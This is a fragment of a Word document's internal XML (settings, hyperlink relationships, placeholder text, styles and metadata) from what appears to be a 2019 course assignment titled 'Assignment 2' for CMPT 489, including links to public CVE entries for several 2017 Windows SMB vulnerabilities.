            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1722751304">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2126150741">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1744790123">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1784692265">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1643457819">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1794128053">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1411199933">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1800950587">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1858347570">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1947150535">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="20173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details.com/cve/CVE-2017-0145/"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cvedetails.com/cve/CVE-2017-0144/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cvedetails.com/cve/CVE-2008-42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cvedetails.com/cve/CVE-2017-0143/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cvedetails.com/cve/CVE-2017-014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vedetails.com/cve/CVE-2017-014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vedetails.com/cve/CVE-2017-0146/"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64145D91E547D6B4B41DA45D1CCA39"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{3F6C4739-2461-4768-8423-C19821CA3AE6}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="001F4CAA" w:rsidRDefault="001F4CAA" w:rsidP="001F4CAA">
          <w:pPr>
            <w:pStyle w:val="1264145D91E547D6B4B41DA45D1CCA39"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
            </w:rPr>
            <w:t>[Company name]</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="98211AB81EA4441C877B7F926E2D5FFB"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{D9B4DD16-D48B-4563-918C-15A58C1715A0}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="001F4CAA" w:rsidRDefault="001F4CAA" w:rsidP="001F4CAA">
          <w:pPr>
            <w:pStyle w:val="98211AB81EA4441C877B7F926E2D5FFB"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
              <w:color w:val="4472C4" w:themeColor="accent1"/>
              <w:sz w:val="88"/>
              <w:szCs w:val="88"/>
            </w:rPr>
            <w:t>[Document title]</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="E46309CEE61040F78C3225BDC05C3C32"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{923A216E-94A0-4366-8872-62EE90093542}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="001F4CAA" w:rsidRDefault="001F4CAA" w:rsidP="001F4CAA">
          <w:pPr>
            <w:pStyle w:val="E46309CEE61040F78C3225BDC05C3C32"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:color w:val="4472C4" w:themeColor="accent1"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>[Author name]</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="30559BED5F244700B18B6F5301F1D291"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{296CFC2B-E818-437C-B7EB-F14D40F0FEA2}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="001F4CAA" w:rsidRDefault="001F4CAA" w:rsidP="001F4CAA">
          <w:pPr>
            <w:pStyle w:val="30559BED5F244700B18B6F5301F1D29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A"/>
    <w:rsid w:val="001F4CAA"/>
    <w:rsid w:val="00427461"/>
    <w:rsid w:val="0093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4145D91E547D6B4B41DA45D1CCA39">
    <w:name w:val="1264145D91E547D6B4B41DA45D1CCA39"/>
    <w:rsid w:val="001F4CAA"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="98211AB81EA4441C877B7F926E2D5FFB">
    <w:name w:val="98211AB81EA4441C877B7F926E2D5FFB"/>
    <w:rsid w:val="001F4CAA"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="E46309CEE61040F78C3225BDC05C3C32">
    <w:name w:val="E46309CEE61040F78C3225BDC05C3C32"/>
    <w:rsid w:val="001F4CAA"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="30559BED5F244700B18B6F5301F1D291">
    <w:name w:val="30559BED5F244700B18B6F5301F1D291"/>
    <w:rsid w:val="001F4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4AEA19-C72B-4BFB-9594-1B0D96CAC76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4294967265</TotalTime>
  <Pages>1</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Assignment 2</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>CMPT 489</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Marcelo Ollin Paco Zepeda</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>zully comas</cp:lastModifiedBy>
  <cp:revision>13</cp:revision>
  <cp:lastPrinted>2019-11-26T06:12:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-09-28T05:35:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-11-26T06:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>